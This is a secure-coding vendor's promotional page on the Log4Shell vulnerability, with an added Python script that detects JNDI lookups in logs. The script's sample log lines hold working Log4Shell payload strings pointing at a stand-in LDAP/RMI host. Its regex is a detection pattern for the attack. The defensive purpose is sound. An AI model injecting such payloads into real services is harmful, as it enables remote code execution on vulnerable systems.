Uplift your secure code skills systematically with 100% hands-on training in how to spot and fix vulnerabilities, in your choice of programming language and frameworks.
In this showcase, we will take you from learning the basic idea of the Log4j Log4Shell security vulnerability to experiencing its impact in a real-world scenario. The Secure Code Warrior skills platform’s unique preventative approach will help make security an intrinsic part of your thought process and workflow to produce quality software - fast!
Kick start your mastery of Log4Shell with free learning resources
What is this vulnerability?
Log4Shell is a high-severity vulnerability (CVE-2021-44228, CVSSv3 10.0) impacting multiple versions of the Apache Log4j 2 utility. It allows unauthenticated remote code execution. Log4j-core is one of the most widely used Java logging libraries, which puts millions of applications at risk.
Where does this vulnerability usually arise?
Logged user input is evaluated at runtime. If the log entry contains the JNDI (Java Naming and Directory Interface) prefix, the service performs a lookup via a protocol (LDAP, RMI, DNS, etc.) and makes a request to the specified server, which the attacker controls. The response contains a classpath referring to a malicious payload, which is then executed on the vulnerable service.
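A detection sketch for the pattern described above, added here as an example and not part of Secure Code Warrior's material: it scans log lines for JNDI lookup expressions, including percent-encoded ones, and reports the protocol and destination server. The function names, the host name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# A JNDI lookup expression using one of the protocols named in the text.
JNDI_RE = re.compile(r"\$\{jndi:(ldaps?|rmi|dns):/{0,2}([^/:}\s]+)", re.IGNORECASE)

# Constructed sample log lines (not taken from a real system).
SAMPLE_LOG = [
    "2021-12-10 10:01:02 INFO  Login failed for user alice",
    "2021-12-10 10:01:07 INFO  User-Agent: ${jndi:ldap://callback.example.invalid:1389/a}",
    "2021-12-10 10:01:09 INFO  GET /search?q=%24%7Bjndi%3Armi%3A%2F%2Fcallback.example.invalid%2Fb%7D",
    "2021-12-10 10:01:11 INFO  Config loaded from ${sys:app.home}/conf",
]


def find_jndi_lookups(line):
    """Return (protocol, host) pairs for JNDI lookups found in one log line."""
    hits, seen, text = [], set(), line
    for _ in range(3):  # raw form plus up to two layers of percent-encoding
        for match in JNDI_RE.finditer(text):
            hit = (match.group(1).lower(), match.group(2).lower())
            if hit not in seen:
                seen.add(hit)
                hits.append(hit)
        decoded = unquote(text)
        if decoded == text:  # nothing left to decode
            break
        text = decoded
    return hits


def scan(lines):
    """Return (line_number, protocol, host) for every flagged log line."""
    return [
        (number, protocol, host)
        for number, line in enumerate(lines, start=1)
        for protocol, host in find_jndi_lookups(line)
    ]


if __name__ == "__main__":
    for number, protocol, host in scan(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {protocol} to {host}")
```

The non-JNDI lookup on the last sample line is left alone; only expressions that would trigger a request to an external server are reported.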
Forget boring training - systematically build your secure coding skills by trying out this real-world Log4Shell scenario!
Level-up your secure coding knowledge with 100% hands-on coding framework specific challenges covering web, mobile, front-end, APIs, IaC, and more.
Guided learning pathways help you reach your learning goals faster by focusing on OWASP Top 10, Injection Flaws or specific vulnerabilities in your company's code base. Build your secure coding knowledge with interactive framework-specific coding exercises that challenge you to:
Secure Code Warrior training provides hyper-relevant content across 155+ different vulnerability types, including the all-important OWASP Top 10 and CWE/SANS Top 25. Framework-specific training ensures you learn about the exact APIs and code structure that you use daily. Secure Code Warrior content is available in more than 55 languages and frameworks. From COBOL to Rust and everything in between - we've got you covered!
Test your secure coding skills in tournaments and challenge your peers to win the ultimate bragging rights.
In a Secure Code Warrior tournament, players are presented with a series of coding challenges and missions, ranked from easy through to fiendishly hard! Get fired up for a friendly competition that is not only fun but also educational! Whether you are just beginning your security journey or are a grizzled veteran, there is something for everyone in a secure coding tournament.
A direct object reference is when a specific record (the 'object'), is referenced within an application. It usually takes the form of a unique identifier and may appear in a URL.
Sensei empowers you with a secure coding solution directly in your IDE, so that you can share your software knowledge, increase your team’s efficiency and improve secure coding practices by suggesting guidance that breaks the cycle of recurring poor coding practices.
Secure Code Warrior for GitHub adds contextual application security training material to the pull requests and issues you are working on, giving you access to knowledge when you need it most in order to help you and your team ship quality code faster.
Secure Code Warrior for Jira adds contextual application security training material to the issues you are working on, giving you access to knowledge when you need it most in order to help you and your team ship quality code faster.